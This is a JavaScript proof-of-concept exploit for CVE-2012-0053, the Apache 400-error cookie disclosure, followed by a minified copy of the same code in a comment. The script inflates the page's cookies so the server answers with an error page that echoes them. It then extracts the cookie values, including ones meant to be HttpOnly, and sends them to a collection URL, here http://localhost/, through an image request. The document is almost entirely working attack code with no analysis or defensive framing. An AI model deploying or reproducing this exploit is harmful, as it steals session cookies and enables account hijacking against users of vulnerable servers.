CVE-2012-0053 Exploit

CVE-2012-0053.js

(function(d){
	desired_length = 8192;
	for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
	for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
	for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
	d.cookie = cookie_val;
	d.cookie = "888=8";
	x = new XMLHttpRequest();
	x.onreadystatechange = function(){
		if (x.readyState == 4 && x.status == 400){
			cookie = x.responseText.split('888=8; ')[1].split("\n")[0];
			z = new Image();
			z.src='http://localhost/' + escape(cookie);
		};
	};
	x.open('GET',document.location.href+'baz',true);
	x.send();
}(document))

// (function(e){a=8192;for(b="=";b.length<=97;b+="A"){}for(i=100;(a-e.cookie.length)>111;i++,e.cookie=i+b){}for(b="999=";(b.length+e.cookie.length+9)<=a;b+="A"){}e.cookie=b;e.cookie="888=8";x=new XMLHttpRequest();x.onreadystatechange=function(){if(x.readyState==4&&x.status==400){c=x.responseText.split("888=8; ")[1].split("\n")[0];z=new Image();z.src="http://localhost/"+escape(c)}};x.open("GET",document.location.href+"baz",true);x.send()}(document));